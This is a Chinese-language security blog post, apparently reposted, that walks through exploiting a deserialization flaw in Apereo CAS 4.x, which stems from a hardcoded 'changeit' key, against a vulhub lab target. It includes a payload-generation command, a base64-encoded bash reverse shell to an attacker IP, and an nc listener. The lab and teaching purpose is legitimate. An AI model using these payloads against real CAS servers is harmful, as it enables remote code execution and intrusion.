Apereo-cas 4.x反序列化漏洞

admin 2025年2月24日13:40:39评论29 views字数 1530阅读5分6秒阅读模式

Apereo-cas 4.x反序列化漏洞

影响范围

Apereo-cas 4.1.7之前

漏洞成因

Webflow中使用了默认密钥changeit,代码如下:

publicclassEncryptedTranscoderimplementsTranscoder{private CipherBean cipherBean;privateboolean compression = true;publicEncryptedTranscoder()throws IOException {        BufferedBlockCipherBean bufferedBlockCipherBean = new BufferedBlockCipherBean();        bufferedBlockCipherBean.setBlockCipherSpec(new BufferedBlockCipherSpec("AES""CBC""PKCS7"));        bufferedBlockCipherBean.setKeyStore(this.createAndPrepareKeyStore());        bufferedBlockCipherBean.setKeyAlias("aes128");        bufferedBlockCipherBean.setKeyPassword("changeit");        bufferedBlockCipherBean.setNonce(new RBGNonce());this.setCipherBean(bufferedBlockCipherBean);    }

漏洞利用

环境准备

名称
IP
攻击机
192.168.75.162
靶机
192.168.75.146

首先输入以下命令进入vulhub里启动靶场,然后在攻击机里访问http://192.168.75.146:8080/cas/login即可

cd vulhub-master/apereo-cas/4.1-rcedocker-compose up -d
Apereo-cas 4.x反序列化漏洞
image-20220720101832459

漏洞复现

首先准备好生成payload的工具:apereo-cas-attack-1.0-SNAPSHOT-all.jar

工具地址:https://github.com/vulhub/Apereo-CAS-Attack/releases

然后准备好反弹shell的命令,需要对其进行base64加密

//反弹shell命令,注意替换为自己的bash -i >& /dev/tcp/192.168.75.162/6666 0>&1//base64加密YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljc1LjE2Mi82NjY2IDA+JjE=
java  -jar  apereo-cas-attack-1.0-SNAPSHOT-all.jar  CommonsCollections4 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljc1LjE2Mi82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}"

执行完上述命令会生成一串payload,接下来新打开一个cmd窗口执行以下命令:

nc -lvvp 6666

监听启动后我们在浏览器输入账号密码抓包,发送到重放器,替换execution的内容并发送,可以看到如下图,反弹shell成功,此漏洞利用成功

Apereo-cas 4.x反序列化漏洞
image-20220720102209469
Apereo-cas 4.x反序列化漏洞
image-20220720102221258

原文始发于微信公众号(0xh4ck3r):Apereo-cas 4.x反序列化漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月24日13:40:39
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Apereo-cas 4.x反序列化漏洞https://cn-sec.com/archives/3772015.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息